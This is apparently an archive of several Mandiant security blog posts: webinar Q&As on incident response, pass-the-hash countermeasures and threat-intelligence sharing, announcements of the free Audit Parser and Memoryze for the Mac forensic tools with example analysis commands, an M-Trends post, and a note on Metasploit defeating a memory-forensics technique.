Q&A Webinar Follow-Up – State of the Hack: Back to the Remediation

As a follow-up to our recently held State of the Hack: Back to the Remediation webinar, questions answered by presenter Jim Aldridge are listed below. 

  1. How do you develop a business case for resources for security incident management, remediation, and log analysis?
    This is an area with which many organizations that have not experienced an incident struggle with. I would recommend conducting a realistic incident simulation to exercise the organization's incident response plan. This should go beyond a table-top exercise and actually test responders' capabilities to use logs to identify and track attacker activity. This approach should provide the organization a good understanding of weaknesses in these areas. For example, I assisted a bank with planning and executing this type of exercise. They were concerned about targeted threats and had never experienced a security breach. After a series of meetings to better understand their environment, we designed a scenario based on an incident we had worked on in the past. In their scenario, picture a blank screen with a SQL Server and a question mark on it. We would give them a clue, and then we would on and say, "Okay, so what would you do if you got this information?" And then we provided a little bit more of the diagram. It was in the style of a choose your own adventure.
  2. During incident response what tools do you use for networking indicators; are any of them open source?
    Typically, we like to deploy our network sensors, which we don't offer as a standalone product at this time. That intelligence is only available as part of our Managed Defense™ service, in large part due to the back end processing that's involved. I would categorize those as proprietary. They do a lot for us, but we also leverage whatever the client has in place.
    t
    Sources of helpful information include:
    • Firewall logs (established connection information)
    • DNS logs (which host resolved a given domain name at a given time)
    • NetFlow (connection information)

    One of the more mature security organizations that I've worked an incident with has a particularly effective network monitoring set up. They collect NetFlow information from across the environment. This enables them to rapidly identify lateral movement.

  3.  

  4. Is the Mandiant incident response tool available to the public?
    Mandiant for Intelligent Response® is a commercial product. As I mentioned, Redline™ is a free tool that I encourage you to take a look at. It is very similar to MIR in terms of the capabilities on individual hosts, but it's designed to be executed against one host versus an enterprise.
  5. What are your thoughts on best countermeasures against pass the hash tactics?
    It is most important to prevent the attacker from getting access to that hash in the first place. That's one reason why I like application whitelisting so much, particularly on domain controllers, because this can prevent even a domain admin from running the hash dumper. Unfortunately, once the attacker has that hash, it's not good. Another strategy is to reduce the number of places where an attacker could readily obtain privileged users' hashes. First, privileged users should operate with non-privileged accounts for their day-to-day activities. This helps reduce the impact of a spear phishing email or strategic web compromise that impacts that user. To conduct administration activities, connect to a jump server using two-factor authentication. Maybe incorporate a password vault so that the vault connects the user to the jump server, after a two-factor authentication process, and the password is never divulged to the user (or present on the admin's PC). Then lock down the jump server with application whitelisting, implement enhanced logging and monitoring. Configure firewalls and systems to only accept inbound connections on administrative services from the jump servers and not from the network at large. Each of these countermeasures helps to mitigate a part of the attack lifecycle; implementing them together can help greatly strengthen the security posture.
  6. What kind of back door were the attackers using on the first infected systems?
    That varies widely. On some cases I worked recently we've seen Gh0st RAT, we've seen Poison Ivy, we've seen a custom back door that doesn't really have a name because it's something that this one particular group uses. The particular tool there wasn't the point, just more the fact that they were infected. We're seeing a lot more use of publicly available back doors. They can be pretty effective, and can also be hard to detect.
  7. How would one ever determine the true scope of a foothold in a global environment if it's using multiple command and control points?
    To answer that question, you have to start by comprehensively surveying the environment for indicators of compromise (IOC). You start by taking the pieces of information you know, e.g. the backdoors the attacker is known to use, known compromised accounts, and command-and-control IP addresses. Perhaps this yields you two systems that are initially suspected of being compromised. You then you ask the question, "Well, where did they go from those two systems? How did they get on those two systems?" You conduct forensic analysis to understand all the facts related to those systems: how did they gain access, what did they do, where did they go, and what tools did they use. Then you follow those threads, identifying more systems. This can be challenging in a large environment, which is one of the really helpful use cases for Mandiant for Intelligent Response. The largest organization where I have conducted this type of incident response had around 135,000 hosts. With a team of five or six people and about eight weeks, we could get a handle on that environment.
  8. How do we balance the need to contain and respond and the need to preserve forensic evidence?
    It depends on whether you think that it's likely to go to court or in litigation. You want to make sure that your procedures are as least intrusive as possible, but typically in most APT-type cases, we don't really worry as much about formal chain of custody for systems or preserving every system in its original state. The way I would look at it is, I would develop a set of procedures for your organization to talk about how you determine when you need to preserve and what that means and what your standard operating procedures are, so that you can explain and minimize - both explain what you're doing as well as minimize - the impact on systems.

Q&A Follow-up – Tools of Engagement: The Mechanics of Threat Intelligence

As a follow-up to our recently held Tools of Engagement - The Mechanics of Threat Intelligence: Analysis, Information Sharing and Associated Challenges webinar, questions answered by presenters Doug Wilson and Jen Weedon are listed below. To view the archived webinar, please click here.

1. We received some questions asking about work being done by Mandiant and others on open source intelligence sharing. We've got some questions about STIX and TAXII in comparison to other frameworks.

To succeed with sharing indicators internally or externally, you have to pick a standardized format. That can be anything, honestly, from a tab-delimited file to complicated XML. If you are looking at sharing outside your organization, there are a couple of different standards that are out there to look at.

OpenIOC is what Mandiant uses for recording and transmitting threat indicators. DHS funds a project through MITRE called STIX, with a transport and exchange mechanism that is called TAXII. IETF also has the MILE working group, which has a protocol named IODEF, which uses RID as its transfer and exchange mechanism. These are all ways of packaging up threat information and shipping them off to other people or organizations. We've been looking at interacting with both groups, and trying to make sure that OpenIOC interacts with both sets of protocols where it can.

A lot of people are still very uncomfortable with the idea of sharing openly, so a lot of the sharing that's happening out there is going to be happening in smaller, closed groups.

The protocols that we have discussed are all open standards, whether somebody is sharing in a small group or somebody is sharing in a large group. Since they are all open and feely available, there's not any restrictions to using them for sharing, and ultimately, we're hoping that there are some corporations out there that are standing up sharing portals - there are also government entities that are doing this as well. We're hoping that ultimately, people will be able to pick the tools that work properly for their particular situation. But whatever standard (or standards) shakes out as being the one most people use, it will need to be something that's open and accessible.

There were several questions about sharing groups. If you're not familiar with the idea of an ISAC, I looking them up online. ISAC stands for Information Sharing and Analysis Center. There's an ISAC Council website that lists a bunch of the ISACs (not endorsed by Mandiant, but for reference: http://www.isaccouncil.org/memberisacs.html). Some of the larger ISACs have their own events and conferences, FS-ISAC is one that is engaged in adopting threat information sharing standards (such as STIX).

There are also specific groups for the Defense Industrial Base, or DIB. Associated with the DoD Cybercrime Center (DC3) is the DoD-DIB Collaborative Information Sharing Environment (DCISE).

2. As an investment bank, how should we advise our clients concerning cyber security audit and compliance prior to making an acquisition?

We have seen threat activity around or related to acquisitions and mergers. Entities should be aware that advanced attackers are often quite aware of business decisions and movements in industries that they're targeting, so you should take this into account when determining how you want to allocate resources for risk management.

We can't directly advise any specific course of action, and folks should consult their counsel or their risk management personnel on specific actions, but on numerous occasions we have been asked to do investigations that center around acquisitions and mergers. We often advise our clients to consider doing threat assessments as part of the due diligence process when they are thinking of acquiring other companies. In addition, we conduct regular analysis on risk factors for companies who may be targeted by advanced threat actors to identify which variables may place them at higher likelihood of being targeted, and why. These variables may include the industry they're in, their intellectual property, strategic partnerships, business strategy, and overseas operations.

3. What are the options - in other words, legal or technical - available to counterattack hackers from world nations who don't respect international laws?

Mandiant does not endorse or support hacking back in any form. We suggest an in-depth incident response life cycle within your organization's network and host, and an ongoing cycle of detection, response and containment. We also suggest reaching out to law enforcement or appropriate authorities responsible for national security

4. What are the most important items to gather and share with a threat team for vulnerability analyses?

An accurate depiction of vulnerabilities in an enterprise can help inform risk management decisions. This should be a two-way communication. A team that deals with threats can prioritize responding to some threats above others if they know certain vulnerabilities or weaknesses exist within their environment, and then the threat team can talk with whoever does the vulnerability assessment if they think certain types of actors are more likely to exploit certain types of vulnerabilities, so those vulnerabilities have a higher priority for getting fixed.

5. What kind of training do you suggest for intelligence analysis, especially cyber threat intelligence analysis?

One of the most important things a company can do, or anyone that does threat intel in an office can do is to get the technical folks and the sort of more traditional intel analysts in the room together to observe sort of how the other side works.

It may not be possible to fully cross-train both types of personnel on each other's disciplines, but the more interaction they have and the more folks get out of their comfort zones with what they're used to doing, the better your teams will understand with each other. Communication is key, especially when dealing with technical and non-technical teams having to work together.

6. Strategic versus tactical - why would individual firms care beyond what protects them from immediate threats? In other words, why would they care about strategic over the tactical?

This gets into debates about attribution, categorization of threats and threat tracking, and what that matters, which is a large topic in and of itself. It really depends on where an organization is in terms of the maturity of its security capabilities.

If an organization's security interests are strictly operational and are just looking at turning stuff away from the firewall and blocking things, the idea of this longer-term view of threat actors is not going to be interesting, because they are just looking at what can immediately stop the bleeding. As an organization becomes more mature in their security posture and starts to evolve it into basing security off of threat intelligence, they will be able to appreciate the use of strategic intelligence. But this requires an investment of a lot more resources, and investment in personnel and programs that are not normally considered standard for traditional "information security" yet.

7. Is threat intelligence a myth?

Again, this depends a lot on the maturity level that a security program is at. It's not a myth, but it might be useless to entities that do not have the resources or focus to do anything with threat intelligence.

We've seen that attribution is one area where people can go down a lot of rabbit holes. Some folks spend a lot of time arguing about the merit of attribution, and can get wrapped around the fact that attribution down to a specific human being is nearly impossible on the Internet. It doesn't necessarily matter who is at the keyboard unless you're a nation state or you're somebody who's going to be somehow doing an international lawsuit against a particular person.

But the groups of actors, and what is motivating these groups to make them want to act against your enterprise, should be of interest to you. If you want to be proactive about securing your network and distributing resources to protect your network, it helps to know that someone is using a particular type of attack and they're not using another set of attacks. This may help you determine how to allocate resources for defense.

If you have less resources, if you have a less mature security posture, if you're not as involved in terms of where you are in the life cycle of getting a sophisticated security program set up - and a lot of people are having a hard time getting down that road because you have the classic problems of justifying your budget, or convincing your CEO that they care - you're not necessarily going to care about a strategic view of threat actors.

But if you're someone who's invested more in security, you have a larger investment in spending money on this and doing some sort of defense that is informed by a strategic viewpoint, it's going to matter a lot more, and we're seeing a lot more major companies turning in this direction, over time. So there could be naysayers, but the market is slowly speaking out against them.

8. What are some resources for analysts and detailed methodologies and curriculums as well as buying threat intelligence and reviews on different products and services?

Without going into specifics on the latter question, there are certainly a lot of industry research organizations that have racked and stacked different threat intelligence providers and their solutions.

I guess it really gets to what you can consume. Like Doug was saying, if you have the resources and the political will inside your organization to consume more strategic intelligence, you may have different needs and pursue different solutions providers.

In terms of developing a threat intel capability, there are certainly lots of firms out there, including Mandiant, who consult on what you need to do to mature in that sense.

9. Is there public or closed IOC sharing platforms besides ioc.forensicartifacts.com?

A couple of other entities out there are using OpenIOC publicly. If you are familiar with the company AlienVault, their lab, when they do posts of threat information and blog posts about malware, will include an IOC as part of their sharing.

We also do that with some of our blog posts and forum posts. Some of those are open and some of those closed to our customers, depending on the level of content. There, unfortunately, is not a wonderful public open sharing site for all of the IOCs out there other than http://ioc.forensicartifacts.com.

Most people are still kind of uncomfortable with the idea of sharing openly, so you're going to see closed communities springing up here and there and, over time, they're going to open up or improve or share with larger audiences. We hope to continue to contribute to that conversation as it evolves.

10. What are the sources of IOCs

IOCs can come from a variety of sources. In Mandiant's case, they are a product of a wide variety of different sets of input throughout our business units, curated over time by our intel team. We capture IOCs from our investigative work, from feedback from our product and managed services customers, and from a wide variety of intel sources, including examining malware and network traffic. Organizations could create IOCs from their own knowledge of threats that they face, but usually they use a combination of their knowledge plus information gleaned from other security or intelligence sources.

11. What kind of IOC would you recommend sharing publicly or just in closed groups, so attackers don't know detection methods?

IOCs don't necessarily give away detection methods. Specific pieces of intelligence may give away sources and methods, and you need to determine risk to your intel sources before sharing anything. However, in most cases, especially if you are already trying to combat an opponent that has launched attacks against your networks, they probably assume that you can capture anything that they may deploy against you. If you are using external sources of intelligence, the situation becomes more complex, which is where having trained intelligence staff and experienced analysts can help you make appropriate decisions. The risk tolerance of each organization is going to be different, so it will likely be something that you will have to tailor to your organization's limits.

12. What are some products that can be used for capturing/managing intelligence?

We have previously discussed the use of threat intel in the form of IOCs. The freely available Mandiant IOC Editor can be used to write and edit IOCs, and Redline can consume IOCs for host based investigations. Both of these complement the commercial Mandiant for Intelligent Response® offering.

Mandiant IOC Editor

Redline

Additionally, during the webinar we were also asked about tools for gathering and cataloging more strategic intelligence. None of these are endorsed by Mandiant. However, some examples of tools to consider are:

Splunk http://www.splunk.com/

Palantir http://www.palantir.com/what-we-do/

Lynxeon http://www.21ct.com/products/lynxeon/

13. Do domains and IPs alone attribute activity to an actor if the actor was seeing using a domain or an IP once?

Attribution to actors is a complicated and time-consuming process. Actors' use of certain domains or IPs as part of their attack infrastructure is only part of the story. Threat groups also frequently share infrastructure, malware, or other tools. There's certainly no 1:1 correspondence between IPs and domains and specific actors, especially if you've only observed the correlation once. They're useful data points for more thorough analysis.

New Open Source Tool: Audit Parser

Mandiant RedlineTM and IOC Finder TM collect and parse a huge body of evidence from a running system. In fact, they're based on the same agent software as our flagship Mandiant Intelligent Response® product. During the course of their "audits", these tools conduct comprehensive analysis of the file system (including hashing, time stamps, parsing of PE file structures, and digital signature checks), registry hives, processes in memory, event logs, active network connections,DNS cache contents,web browser history, system restore points, scheduled tasks, prefetch entries, persistence mechanisms, and much more.

Once this data is collected, Redline and IOCFinder currently allow you to do one of two things:

  • Review the contents of memory through a visual workflow in Redline
  • Search for Indicators of Compromise (IOCs) and generate a report of "hits"

But what if you want to analyze all of the raw evidence - not just memory or IOC hits - and do traditional forensics and timeline analysis? That's where Audit Parser steps in. It's the newest addition to Mandiant's portfolio of free software.

Audit Parser is simple:it takes the complex XML data produced by Redline or IOCFinder and converts it into human-readable tab-delimited text. You can then easily review the output in Excel, use a dedicated CSV file viewer (we're fans of "CSVed" and"CSVFileView"), import it into a database, or grep / manipulate it to your heart's content.

When paired with Redline's new start-up workflow to build a "collector" script, Audit Parser gives you a complete(and free)live response analysis toolkit. You can customize the Redline collector to gather as much or as little evidence as desired, run it on your target system, and then easily review all of the results following a quick conversion with Audit Parser.

The screen capture below shows Audit Parser's options - it's pretty straightforward to use:

Tabular data in Excel doesn't make for the most exciting screen shots, but we wanted to give you a glimpse into what the output looks like and the extent of evidence available for filtering, sorting, and analysis:

  • A filtered view of a file system audit, showing complete file metadata for all PE files within %SYSTEMROOT% created between 2011-2012 that are not digitally signed.

  • A portion of a prefetch audit, showing how the contents of .PF files are automatically parsed to provide last time executed, # of times executed, and original file path metadata.

  • A portion of a full registry dump, showing review of Active Setup Installed Components registry keys - the data includes all key value / data pairs and last modified dates.

  • A portion of the parsed Windows event logs, showing review of process auditing events including event log source, time generated, event ID, and full event message contents.

The default "comprehensive collector" script in Redline collects all of the artifacts listed above, as well as many more.

But wait - that's not all! Audit Parser also contains timeline generation functionality. Just specify a time & date range, and it will build a sorted timeline of all file system, registry, and event log events that occurred within that period. Future releases will add more audit types and customizability to this feature.

Audit Parser is written in Python and is distributed under the Apache License. It requires the lxml (http://lxml.de/) library. We're also distributing a Windows EXE built with Py2EXE for users that may not have a Python environment set up. You can download the tool and documentation on GitHub at: https://github.com/mandiant/AuditParser

If you have any questions or comments, feel free to leave them below, e-mail me (ryan [dot] kazanciyan [at] mandiant.com), or DM me on Twitter at @ryankaz42. I'll also be at Black Hat USA next week teaching Mandiant's Incident Response course where we'll be going through an in-depth live response analysis lab using Redline, Audit Parser, and other forensic tools. I was on a recent M-Unition podcast discussing the class and how it is completely revamped for 2012. You can listen to the podcast here. Hope to see you there!

Unibody Memory Analysis — Introducing Memoryze™ for the Mac 1.0

Today, Mandiant is introducing a new free tool, Memoryze™ for the Mac 1.0, which brings memory imaging and analysis to the Mac. It joins a growing list of freeware tools Mandiant currently provides.

Memoryze™ for the Mac 1.0 brings many of the features of Memoryze to the Apple Macintosh platform. This new tool enables acquisition of memory images via the command-line or a simple GUI. In addition, Memoryze™ for the Mac 1.0 can perform offline analysis against memory images or live analysis on a running system.

The tool supports the following features:

  • Imaging the full range of system memory
  • Acquiring individual processes memory regions
  • Enumerating all running processes
    • Including those hidden by rootkits

For each process, Memoryze™ for the Mac 1.0 can:

  • Report all open file handles in a process (e.g. all files,sockets, pipes, etc.)
  • List the virtual address space of a process including loaded libraries and allocated portions of heap and execution stack
  • List network connections
    • Active and listening
  • Enumerate
    • All loaded kernel extensions including those hidden by rootkits
    • The System Call Table and Mach Trap Table
    • All running Mach Tasks

Okay, enough of the marketing. Memoryze™ for the Mac 1.0 can be downloaded here. To help get you started we'll present a few of the features in this blog post.

For offline analysis your first step is going to be acquiring memory. The Mac Memory Dumper App makes this process as simple as pushing a button. To begin the acquisition, Memoryze™ for the Mac 1.0 will require you to authenticate so that the application can load a memory dumping driver. After selecting the location to store the image and authenticating, Memoryze™ for the Mac 1.0 will begin the acquisition process. The tool will provide you with a progress bar and an image size monitor for each of your acquisitions (fancy, huh?).

Note that the final size of the dumped image may exceed the size of your physical RAM. If the system has 8GB of physical RAM installed the dump may be 10GB. You may ask yourself, "Self, why is the dumped image bigger than my actual memory size?" There are regions that are physically addressable but are not part of actual DRAM, pesky memory-mapped devices. These regions are written to the image file as 0x0-bytes to help preserve the correct offsets within the image.

Once Memoryze™ for the Mac 1.0 finishes the acquisition; we can use it to perform memory analysis(note Memoryze™ for the Mac 1.0 can also perform analysis on images acquired by other tools). With our data ready, let's run through several of the process analysis features we mentioned above.

We'll start by performing a basic process listing based on the memory image we just created. Execute the command below:

macmemoryze proclist -f ~/Documents/my.mem 2>err.txt

Memoryze™ for the Mac 1.0 will open "my.mem" for analysis and detect two critical pieces of information about the image: the operating system version and whether the system is running 32 or 64-bit kernel. Armed with this information the proclist analysis module locates the operating system data structure that maintains the list of running processes.

If you take a look at the output below, you can see that Memoryze™ for the Mac 1.0 extracts the PADDR, or physical address, of each process (this is also the offset of the process in the acquired memory image file). You can use the PADDR to quickly locate the process in question in an offline tool such as a hex editor. Memoryze™ for the Mac 1.0 also extracts other standard identifying information such as the process NAME, PID and parent PID (PPID). In addition, the tool provides the start time for each process in UTC. Finally, Memoryze™ for the Mac 1.0 extracts each process' associated USERNAME, effective userid (EUID), and real userid (RUID).

Based on the process listing above, we may be interested in getting a more complete understanding of what a particular process may be doing. We can list file descriptors and memory sections for all of the processes in the listing, but this would get pretty lengthy and present too much information at once. Using filters we can limit display to a smaller subset or a single process. We can use the "-n" option to filter processes by NAME or the "-p" to filter processes by PID.Execute the following command:

macmemoryze proclist -w -p 14 ~/Documents/my.mem 2>err.txt

In the image above, we show a snippet of a file descriptor listing for PID 14 using the command-line switch "-p 14". This shows us all open file descriptors for the given process. This includes files, UNIX domain sockets, networking sockets (such as TCP), and so on. For several of the types/subtypes, Memoryze™ for the Mac 1.0 will provide a value associated with the item type. The value for a descriptor of type FILE is the filename associated with the file descriptor while the value for a type SOCKET subtype TCP is the source IP address, destination IP address, and associated ports.

Now that we've completed some filtering, let's dig a little deeper and perform detailed analysis of the "notifyd" process. The image below contains a snippet of its memory sections listing. Memoryze™ for the Mac 1.0 shows us the start and end virtual addresses and a human-readable size for each section. For some memory sections, Memoryze™ for the Mac 1.0 also provides a type, such as MALLOC or IOKIT. These types provide insight into the purpose of the memory section. For other memory sections, Memoryze™ for the Mac 1.0 displays the filename that is located at (or was used to initialize) that particular memory region. Please execute:

macmemoryze proclist -s -p 14 ~/Documents/my.mem 2>err.txt

Neat, huh? So now we've analyzed the standard operating system (OS) process list structure. If it's good enough for the OS, it's good enough for us, right? Not really. It's fairly trivial for malware to unlink itself from the process list that the OS maintains. In light of this, Memoryze™ for the Mac 1.0 provides a process carving feature that allows it to enumerate and analyze processes based on their signature in memory. This means that Memoryze™ for the Mac 1.0 does not have to depend on the OS to provide a list of processes. This enables Memoryze™ for the Mac 1.0 to discover processes that have been hidden from standard OS listings. This same carving feature extends to the kextlist and syscalllist Memoryze™ for the Mac 1.0 features, allowing you to discover other hidden data within the OS.

Now don't forget, Memoryze™ for the Mac 1.0 can be run offline using an acquired memory image, or live, analyzing the running system in real-time. Below we show a system call table listing using the live memory analysis feature of Memoryze™ for the Mac 1.0. Notice the missing "-f" option. We can use this listing to check for system call table hooking. System call table hooking allows attackers to surreptitiously monitor or filter user-level programs interactions with the OS kernel. This is commonly used to hide files and network connections from user-level programs. The syscalllist feature also supports discovery and listing of the Mach Trap table. Mach Trap, what? The mach trap table is analogous to the system call table in the BSD portion of OS X, but within the Mach portion of OS X. So we want to ensure we can check for possible hooking within that table also. To perform a live listing execute:

sudo macmemoryze syscalllist -s

In order to hook the syscall table we would probably want to use a driver. Have no fear! Memoryze™ for the Mac 1.0 can carve loaded kexts from memory. A decent malware author would probably want to hide itself from the OS by unlinking from internal data structures. To combat this, Memoryze™ for the Mac 1.0 will parse live memory or a dead file to find loaded drivers, as shown in the screenshot below.

Memoryze™ for the Mac 1.0 supports an XML output option ("-x") that will create an XML file with an extended version of the console output, only in XML format. "Extended version," you ask? There is only so much console real estate. We must make decision about what information to display. So therefore, stuff gets left out. For example, we parse the full file path of the executing process and the process arguments. These are not displayed in the console output, but are accessible if using the XML output option. These XML files can also be loaded into Mandiant Redline™ (currently windows only, boo!) for viewing in a GUI.

There are other features of Memoryze™ for the Mac 1.0 that we have not detailed here, but we don't want to give you all the answers. What's the fun in that? We really want you to use the tool and provide us with some feedback on features, interface, usages, and so on.

Memoryze™ for the Mac 1.0 currently supports:

  • Mac OS X Snow Leopard (10.6) 32/64-bit
  • Mac OS X Lion (10.7) 32/64-bit

We hope to continue to improve the state of Mac memory analysis for incident responders and security professionals.

"Mac" is a trademark of The Apple Corporation. Mandiant is not affiliated with or endorsed by The Apple Corporation.

M-Trends #1: Malware Only Tells Half the Story

When I joined Mandiant earlier this year, I was given the opportunity to help write our annual M-Trends report. This is the third year Mandiant has published the report, which is a summary of the trends we've observed in our investigations over the last twelve months.

I remember reading Mandiant's first M-Trends report when it came out in 2010 and recall being surprised that Mandiant didn't pull any punches. They talked about the advanced persistent threat or APT (they had been using that term for several years...long before it was considered a cool marketing, buzz word), and they were open about the origin of the attacks. The report summarized what I'd been seeing in industry, and offered useful insights for detection and response. Needless to say, I enjoyed the opportunity to work on the latest version.

In this year's report it details six trends we identified in 2011. We developed the six trends for the report very organically. That is, I spent quite a few days and nights reading all of the reports from our outstanding incident response team and wrote about what we saw-we didn't start with trends and then look for evidence to support them.

If you haven't picked up a copy of the report yet, you can do so here. I will be blogging on each of the six trends over the next two weeks; you can even view the videos we've developed for each trend as each blog post is published:

Malware Only Tells Half the Story.

Of the many systems compromised in each investigation, about half of them were never touched by attacker malware.

In so many cases, the intruders logged into systems and took data from them (or used them as a staging point for exfiltration), but didn't install tools. It is ironic that the very systems that hold the data targeted by an attacker are probably the least likely to have malware installed on them. While finding the malware used in an intrusion is important, it is impossible to understand the full scope of an intrusion if this is the focal point of the investigation. We illustrate actual examples of this in the graphical spread on pages 6-7 of the report.

What does this mean for victim organizations?

You could start by looking for malware, but don't end there! A smart incident response process will seek to fully understand the scope of compromise and find all impacted systems in the environment. This could mean finding the registry entries that identify lateral movement, traces of deleted .rar files in unallocated space, or use of a known compromised account. It turns out that Mandiant has a product that does all of this, but the footnote on page 5 is the only mention you'll see in the entire report (and even that was an afterthought).

Thoughts and questions about this trend or the M-Trends report?

The changing battlefield in Memory

Steve Davis and I gave a talk at Blackhat and at Defcon called Metasploit Autopsy: Reconstructing the scene of the crime. Giving the talk was a blast; both Steve and I were thrilled to be given an opportunity to give a defensive security talk on the Metasploit track. During our talk and in several interviews, we stated that some aspects of computer security are a cat and mouse game. When you make a technique, tool, or other knowledge public people have a chance to analyze what you have done. This analysis can lead to better code, improvements to ideas, or in some cases the breaking of said tools. In the case of Metasploit Forensic Framework (MSFF), the newest release of Metasploit flat out broke MSFF. First, let me give you some background. When we first started writing the tool, we quickly realized that breaking MSFF would take a single line change to Meterpreter. The fix is simple. In our talk, we discussed that when meterpreter called free the received/sent packets were not scrubbed and lay around memory for hours. MSFF capitalized on this using Memoryze to acquire the processes address space which included the process's freed memory. HD and crew were nice enough to wait to patch Meterpreter until after our talk. Meterpreter was patched Saturday with memset's, which zero out the packet data before the memory is freed.

With this fix, our current technique to reconstruct what Meterpreter sent or received does not work. The Metasploit project has broken that ability successfully (something we expected). Our detection will evolve, and HD discussed some ideas he had to make detecting the Meterpreter binary harder. Currently, MSFF can still be used to identify the injected binaries in a process's address space. The Meterpreter binary contains too much code and has too many features to effectively hide in memory. If and when HD patches the reflective loader to scrub Meterpreter's binary data, we'll update MSFF with some fix, more as a proof concept than anything else, to continue to identify the injected DLLs. Hope everyone's recovered from Vegas!

A huge thanks go to Ping, Nikita, Jeff Moss, Val Smith and HD for putting the Metasploit track together. It was not easy, but it went great. A huge thanks to the defcon speakers, who were very flexible.